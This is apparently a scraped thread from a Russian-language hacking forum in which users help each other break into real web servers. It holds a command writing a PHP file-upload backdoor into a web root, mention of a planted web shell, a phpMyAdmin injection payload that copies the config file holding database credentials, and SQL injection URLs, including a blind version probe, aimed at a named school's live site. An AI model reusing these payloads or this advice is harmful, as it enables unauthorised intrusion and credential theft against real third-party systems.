да, спасибо, мне стало лучше, особенно

__________________

You may say I'm a dreamer
But I'm not the only one

Это чтобы проверить есть ли which, если ты не понял =\

А which тебе что покажет, если его нет?
т.е. результат which which и which curl будет разный, если самого which нету? =\

З.Ы. Модеры, сорри

__________________

You may say I'm a dreamer
But I'm not the only one

Хм..попробовал:

echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php

Чет не канает...

Кстати,sudo команда доступна...Забыл добавить,что админка - Там ещё фильтруются двойные кавычки,посему пришлось извращаться через селект и лить свой убогий шелл).Оттуда и выполняю команды теперь.

А <? ... ?> кто напишет?
И что именно не канает? это расплывчатое понятие.
1) не загружается файл (естественно, в файле не скрипт а белиберда)
2) не пишется в сам файл
3) не могу форму сделать для загрузки файла
4) написал чушь, 9.php')" > /var/www/htdocs/write/9.php

__________________

You may say I'm a dreamer
But I'm not the only one

Есть Windows сервер с XAMPP (MySQL 5.03, phpMyAdmin 2.11.4).
Уязвимых скриптов не нашел, страницы - полуголая статика. Обратил внимание на пхпМайАдмин, порылся на ачате - нашел уязвимость, нормального описания ее найти не смог, как использовать тоже.
Кто может объяснить более подробно как использовать уязвимость или дать ссылку, где можно почитать.
P.S. я про server_databases.php?pos=0&amp;dbstats=0&amp;sort_ by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&amp;sort_order=desc&amp;token=[valid token]

тебе нужен валидный токен,т.е надо валидный логин пасс на пхп админ.
порты проскань,можешь найдешь что нить

_http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+union+select+1--&template_set=default

Чет не хочет крутиться дальше ).вывода нету,ascii тож не заюзать...

мор1ров заюзай

http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(substring(ver sion(),1,1)=5,1,(select+1+union+select+2))